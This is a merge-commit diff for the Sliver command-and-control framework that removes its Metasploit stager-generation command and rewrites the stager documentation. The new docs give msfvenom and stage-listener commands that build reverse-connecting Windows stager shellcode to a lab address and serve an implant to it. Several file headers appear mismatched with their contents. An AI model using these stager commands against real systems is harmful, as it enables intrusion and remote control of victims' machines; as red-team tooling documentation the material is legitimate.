Merge pull request #1751 from BishopFox/v1.6.0/remove-msf-stager

Removing generate msf-stager command

Author: moloch--

client/command/exec/msf-inject.go

@@ -49,7 +49,7 @@ func MsfInjectCmd(cmd *cobra.Command, con *console.SliverClient, args []string)
 		return
 	}
 	if pid == -1 {
-		con.PrintErrorf("Invalid pid '%s', see `help %s`\n", lhost, consts.MsfInjectStr)
+		con.PrintErrorf("Invalid pid '%d', see `help %s`\n", pid, consts.MsfInjectStr)
 		return
 	}
 	var goos string

client/command/generate/commands.go

@@ -48,30 +48,6 @@ func Commands(con *console.SliverClient) []*cobra.Command {
 
 	generateCmd.AddCommand(generateBeaconCmd)
 
-	generateStagerCmd := &cobra.Command{
-		Use:   consts.MsfStagerStr,
-		Short: "Generate a stager using Metasploit (requires local Metasploit installation)",
-		Long:  help.GetHelpFor([]string{consts.MsfStagerStr}),
-		Run: func(cmd *cobra.Command, args []string) {
-			GenerateStagerCmd(cmd, con, args)
-		},
-	}
-	flags.Bind("stager", false, generateStagerCmd, func(f *pflag.FlagSet) {
-		f.StringP("os", "o", "windows", "operating system")
-		f.StringP("arch", "a", "amd64", "cpu architecture")
-		f.StringP("lhost", "L", "", "Listening host")
-		f.Uint32P("lport", "l", 8443, "Listening port")
-		f.StringP("protocol", "r", "tcp", "Staging protocol (tcp/http/https)")
-		f.StringP("format", "f", "raw", "Output format (msfvenom formats, see help generate msf-stager for the list)")
-		f.StringP("badchars", "b", "", "bytes to exclude from stage shellcode")
-		f.StringP("save", "s", "", "directory to save the generated stager to")
-		f.StringP("advanced", "d", "", "Advanced options for the stager using URI query syntax (option1=value1&option2=value2...)")
-	})
-	flags.BindFlagCompletions(generateStagerCmd, func(comp *carapace.ActionMap) {
-		(*comp)["save"] = carapace.ActionFiles().Tag("directory/file to save implant")
-	})
-	generateCmd.AddCommand(generateStagerCmd)
-
 	generateInfoCmd := &cobra.Command{
 		Use:   consts.CompilerInfoStr,
 		Short: "Get information about the server's compiler",

client/command/generate/generate-stager.go

@@ -45,7 +45,6 @@ var (
 		consts.InfoStr:          infoHelp,
 		consts.UseStr:           useHelp,
 		consts.GenerateStr:      generateHelp,
-		consts.MsfStagerStr:     generateStagerHelp,
 		consts.StageListenerStr: stageListenerHelp,
 
 		consts.MsfStr:              msfHelp,
@@ -196,33 +195,6 @@ Execution limits can be used to restrict the execution of a Sliver implant to ma
 Due to the large number of options and C2s this can be a lot of typing. If you'd like to have a reusable a Sliver config
 see 'help profiles new'. All "generate" flags can be saved into a profile, you can view existing profiles with the "profiles"
 command.
-`
-	generateStagerHelp = `[[.Bold]]Command:[[.Normal]] generate msf-stager <options>
-[[.Bold]]About:[[.Normal]] Generate a new sliver stager shellcode and saves the output to the cwd or a path specified with --save, or to stdout using --format.
-
-[[.Bold]][[.Underline]]++ Bad Characters ++[[.Normal]]
-Bad characters must be specified like this for single bytes:
-
-generate msf-stager -b 00
-
-And like this for multiple bytes:
-
-generate msf-stager -b '00 0a cc'
-
-[[.Bold]][[.Underline]]++ Output Formats ++[[.Normal]]
-You can use the --format flag to print out the shellcode to stdout, in one of the following transform formats:
-[[.Bold]]bash c csharp dw dword hex java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript[[.Normal]]
-
-[[.Bold]][[.Underline]]++ Advanced Options ++[[.Normal]]
-If there are any advanced options you need to pass to msfvenom, you can use the --advanced flag to provide them. They must be provided in URI query format: option1=value1&option2=value2 and so on.
-The full list of advanced options is available using "show advanced" in msf for the payload corresponding to the chosen protocol:
-	TCP: meterpreter/reverse_tcp
-	HTTP: custom/reverse_winhttp
-	HTTPS: custom/reverse_winhttps
-
-Example:
-	To tell the stager to use the proxy proxy.corp.com:8080 with the user name "corp_drone" and password "MyPassword", you would pass the following string to --advanced:
-	HttpProxyHost=proxy.corp.com&HttpProxyPort=8080&HttpProxyUser=corp_drone&HttpProxyPass=MyPassword
 `
 	stageListenerHelp = `[[.Bold]]Command:[[.Normal]] stage-listener <options>
 [[.Bold]]About:[[.Normal]] Starts a stager listener bound to a Sliver profile.

client/command/help/long-help.go

@@ -136,7 +136,6 @@ const (
 	C2GenerateStr      = "generate"
 	RegenerateStr      = "regenerate"
 	CompilerInfoStr    = "info"
-	MsfStagerStr       = "msf-stager"
 	ProfilesStr        = "profiles"
 	BeaconStr          = "beacon"
 	BeaconsStr         = "beacons"

client/constants/constants.go

@@ -50,7 +50,10 @@ ID  Name  Protocol  Port
 
 ### Metasploit: Bring Your Own Stager
 
-If you want to use [stagers generated by the Metasploit Framework with Sliver](https://www.rapid7.com/blog/post/2022/09/16/metasploit-weekly-wrap-up-176/) (using `msfconsole`, `msfvenom` or the `generate stager` command), you will need to pass the additional `--prepend-size` flag to `stage-listener`, like this:
+**Using Metasploit stagers is only supported on Windows.**
+
+#### Generating an HTTP stager
+If you want to use [stagers generated by the Metasploit Framework with Sliver](https://www.rapid7.com/blog/post/2022/09/16/metasploit-weekly-wrap-up-176/) (using `msfconsole` or `msfvenom`), you will need to pass the additional `--prepend-size` flag to `stage-listener`, like this:
 
 ```
 sliver > stage-listener --url http://192.168.122.1:1234 --profile win-shellcode --prepend-size
@@ -60,26 +63,32 @@ This will prepend the size of the payload to the final binary sent to the stager
 
 Sliver staging listeners only accept `tcp://`, `http://` and `https://` schemes for the `--url` flag. The format for this flag is `scheme://IP:PORT`. If no value is specified for `PORT`, an error will be thrown out.
 
-We can now generate a stager using the `generate stager` command:
+Either `msfconsole` or `msfvenom` can be used directly to generate stager shellcodes or binaries with the `custom` payload type:
 
 ```
-sliver > generate stager --lhost 192.168.122.1 --lport 1234 --protocol http --save /tmp
-
-[*] Sliver stager saved to: /tmp/CIRCULAR_BRA
+msfvenom --payload windows/x64/custom/reverse_winhttp LHOST=192.168.122.1 LPORT=1234 LURI=/hello.woff --format raw --out /tmp/stager.bin
 ```
 
-By default, the staging protocol used is TCP. The `--protocol` flag can be used to specify either `tcp`, `http` or `https` as the staging protocol.
-The generated shellcode can now be used on the target system to start a new Sliver session.
+**Remark**: At the moment, the `custom/reverse_http` payload is not compatible with Sliver shellcodes (the stager crashes). However, one can use the `custom/reverse_winhttp` payload instead.
 
-## Generating Stagers with the Metasploit Framework
+Depending on the payload you choose, you can specify additional options, such as HTTP proxy settings. Use the `msfvenom` flag `--list-options` with a payload type or `show advanced` in `msfconsole`.
 
-The Metasploit framework can also be used to generate stager shellcodes or binaries. One can use either `msfconsole` or `msfvenom` directly, and choose a `custom` payload type:
+#### Generating a TCP stager
+Use the `stage-listener` command to set up a listener that will send the binary to the stager:
 
 ```
-msfvenom -p windows/x64/custom/reverse_winhttp LHOST=192.168.122.1 LPORT=1234 LURI=/hello.woff -f raw -o /tmp/stager.bin
+silver > stage-listener --url tcp://192.168.122.1:1234 --profile win-shellcode --prepend-size
 ```
 
-**Remark**: At the moment, the `custom/reverse_http` payload is not compatible with Sliver shellcodes (the stager crashes). However, one can use the `custom/reverse_winhttp` payload instead.
+Notice that we are using the `tcp://` scheme because this is a TCP stager. The `--prepend-size` option is still necessary because we will be using Metasploit.
+
+As above, either `msfconsole` or `msfvenom` can be used directly to generate stager shellcodes or binaries with the `custom` payload type. Here is an example using `msfvenom`:
+
+```
+# LHOST and LPORT should correspond to the --url parameter of your stage-listener command
+
+msfvenom --payload windows/x64/custom/reverse_tcp LHOST=192.168.122.1 LPORT=1234 --format raw --out /tmp/stager.bin
+```
 
 ## Custom Stagers
 

docs/sliver-docs/pages/docs/md/Stagers.md

@@ -513,7 +513,6 @@ message MsfStagerReq {
   string OS = 5; // reserved for future usage
   StageProtocol Protocol = 6;
   repeated string BadChars = 7;
-  string AdvOptions = 8;
   string HTTPC2ConfigName = 9;
 }